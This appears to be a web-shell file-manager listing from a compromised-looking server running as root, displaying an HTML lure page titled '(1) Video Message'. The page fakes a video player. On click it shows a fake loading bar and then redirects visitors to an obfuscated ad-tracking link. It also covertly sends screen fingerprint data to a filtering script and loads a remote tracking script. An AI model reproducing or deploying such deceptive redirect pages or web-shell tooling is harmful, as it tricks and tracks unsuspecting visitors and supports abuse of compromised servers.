HEX
Server: Apache/2.4.65 (Debian)
System: Linux srv39710 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
User: root (0)
PHP: 8.4.11
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Upload Files
File: /var/www/www-root/data/www/sunmoon.click/platnik111
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="google" content="notranslate">
    <title>(1) Video Message</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            background: #000;
            color: #fff;
            font-family: Arial, sans-serif;
            height: 100vh;
            overflow: hidden;
            cursor: default;
        }
        .container {
            width: 100%;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 20px;
            position: relative;
        }
        .player {
            width: 90%;
            max-width: 800px;
            height: 70vh;
            background: #111;
            border-radius: 8px;
            position: relative;
            overflow: hidden;
            border: 1px solid #333;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        .player-header {
            height: 40px;
            background: #222;
            display: flex;
            align-items: center;
            padding: 0 15px;
            border-bottom: 1px solid #333;
        }
        .controls {
            display: flex;
            gap: 8px;
        }
        .control {
            width: 12px;
            height: 12px;
            border-radius: 50%;
        }
        .control:nth-child(1) { background: #ff5f56; }
        .control:nth-child(2) { background: #ffbd2e; }
        .control:nth-child(3) { background: #27ca3f; }
        .video-area {
            height: calc(100% - 40px);
            display: flex;
            align-items: center;
            justify-content: center;
            background: linear-gradient(45deg, #0a0a0a, #1a1a1a);
            position: relative;
        }
        .play-btn {
            width: 80px;
            height: 80px;
            background: rgba(255,255,255,0.1);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            position: relative;
            transition: all 0.3s ease;
            z-index: 2;
        }
        .play-btn:before {
            content: "";
            width: 0;
            height: 0;
            border-left: 25px solid #fff;
            border-top: 15px solid transparent;
            border-bottom: 15px solid transparent;
            margin-left: 5px;
            transition: all 0.3s ease;
        }
        .player:hover .play-btn {
            background: rgba(255, 68, 68, 0.3);
            transform: scale(1.1);
        }
        .timer {
            position: absolute;
            bottom: 20px;
            right: 20px;
            color: #666;
            font-size: 12px;
            z-index: 1;
        }
        .progress {
            position: absolute;
            bottom: 0;
            left: 0;
            width: 100%;
            height: 3px;
            background: #222;
            z-index: 1;
        }
        .progress-bar {
            width: 40%;
            height: 100%;
            background: #f33;
            animation: loading 15s linear infinite;
        }
        
        /* Loading overlay */
        .loading-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.9);
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            z-index: 100;
            opacity: 0;
            pointer-events: none;
            transition: opacity 0.3s ease;
            border-radius: 8px;
        }
        .loading-overlay.active {
            opacity: 1;
            pointer-events: all;
        }
        .loading-spinner {
            width: 50px;
            height: 50px;
            border: 3px solid rgba(255, 255, 255, 0.1);
            border-top-color: #4285f4;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }
        .loading-text {
            font-size: 16px;
            color: #aaa;
            text-align: center;
        }
        .loading-progress {
            width: 200px;
            height: 4px;
            background: rgba(255, 255, 255, 0.1);
            border-radius: 2px;
            margin-top: 15px;
            overflow: hidden;
        }
        .loading-progress-bar {
            height: 100%;
            width: 0%;
            background: linear-gradient(90deg, #4285f4, #34a853);
            border-radius: 2px;
            transition: width 0.3s ease;
        }
        
        @keyframes loading {
            from { width: 0; }
            to { width: 100%; }
        }
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        
        /* Loading dots animation */
        .loading-dots {
            display: flex;
            gap: 8px;
            margin-top: 15px;
        }
        .dot {
            width: 10px;
            height: 10px;
            background: #4285f4;
            border-radius: 50%;
            animation: bounce 1.4s infinite ease-in-out both;
        }
        .dot:nth-child(1) { animation-delay: -0.32s; }
        .dot:nth-child(2) { animation-delay: -0.16s; }
        @keyframes bounce {
            0%, 80%, 100% { transform: scale(0); opacity: 0.5; }
            40% { transform: scale(1); opacity: 1; }
        }
        
        @media (max-width: 768px) {
            .player {
                height: 60vh;
            }
            .play-btn {
                width: 60px;
                height: 60px;
            }
            .play-btn:before {
                border-left-width: 20px;
                border-top-width: 12px;
                border-bottom-width: 12px;
            }
            .loading-spinner {
                width: 40px;
                height: 40px;
            }
            .loading-text {
                font-size: 14px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="player" id="videoPlayer">
            <div class="player-header">
                <div class="controls">
                    <div class="control"></div>
                    <div class="control"></div>
                    <div class="control"></div>
                </div>
            </div>
            <div class="video-area">
                <div class="play-btn" id="playButton"></div>
                <div class="timer">00:13</div>
            </div>
            <div class="progress">
                <div class="progress-bar"></div>
            </div>
            
            <!-- Loading overlay -->
            <div class="loading-overlay" id="loadingOverlay">
                <div class="loading-spinner"></div>
                <div class="loading-text">Loading...</div>
                <div class="loading-progress">
                    <div class="loading-progress-bar" id="progressBar"></div>
                </div>
                <div class="loading-dots">
                    <div class="dot"></div>
                    <div class="dot"></div>
                    <div class="dot"></div>
                </div>
            </div>
        </div>
    </div>

    <script>
        (function(){
            const videoPlayer = document.getElementById('videoPlayer');
            const playButton = document.getElementById('playButton');
            const loadingOverlay = document.getElementById('loadingOverlay');
            const progressBar = document.getElementById('progressBar');
            let clicked = false;
            
            function generateClickId() {
                return Date.now() + '_' + Math.random().toString(36).substr(2, 9);
            }
            
            function getTargetUrl(clickId) {
                const parts = [
                    '92orb.com/link?',
                    'z=9417679',
                    'var=sunmoon1',
                    'ymid='
                ];
                return 'https://' + parts[0] + parts[1] + '&' + parts[2] + '&' + parts[3] + clickId;
            }
            
            function handleAction(e) {
                if (clicked) return;
                
                // Минимальное время на странице (3 секунды)
                const timeOnPage = Date.now() - performance.timing.navigationStart;
                if (timeOnPage < 1000) {
                    return;
                }
                
                e.preventDefault();
                clicked = true;
                
                const clickId = generateClickId();
                const targetUrl = getTargetUrl(clickId);
                
                // 1. Анимация кнопки play
                playButton.style.transform = 'scale(1.3)';
                playButton.style.background = 'rgba(255, 68, 68, 0.5)';
                playButton.style.transition = 'all 0.3s ease';
                
           
                setTimeout(() => {
            
                    loadingOverlay.classList.add('active');
                    
               
                    let progress = 0;
                    const progressInterval = setInterval(() => {
                        progress += 2 + Math.random() * 3;
                        if (progress > 100) progress = 100;
                        progressBar.style.width = progress + '%';
                        
                    
                        if (progress >= 100) {
                            clearInterval(progressInterval);
                            
                         
                            setTimeout(() => {
                                window.location.href = targetUrl;
                            }, 300);
                        }
                    }, 40);  
                    
                }, 300); 
            }
            
            // Добавляем обработчики событий
            playButton.addEventListener('click', handleAction);
            videoPlayer.addEventListener('click', function(e) {
                // Если клик не на кнопке play
                if (e.target !== playButton && !playButton.contains(e.target)) {
                    handleAction(e);
                }
            });
            
            // Для мобильных устройств
            playButton.addEventListener('touchstart', function(e) {
                e.preventDefault();
                handleAction(e);
            }, { passive: false });
            
            videoPlayer.addEventListener('touchstart', function(e) {
                if (e.target !== playButton && !playButton.contains(e.target)) {
                    e.preventDefault();
                    handleAction(e);
                }
            }, { passive: false });
            
        })();
    </script>
	<script>
var abc = new XMLHttpRequest();
var microtime = Date.now();
var abcbody = "t="+microtime+"&w="+screen.width+"&h="+ screen.height+"&cw="+document.documentElement.clientWidth+"&ch="+document.documentElement.clientHeight;
abc.open("POST", "/protect/8.php", true);
abc.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
abc.send(abcbody);
</script>
  <script type="text/javascript" src="https://sunmoon.click/process.js?id=1556902252&p1=sub1&p2=sub2&p3=sub3&p4=sub4" async> </script>
	
	

</body>
</html>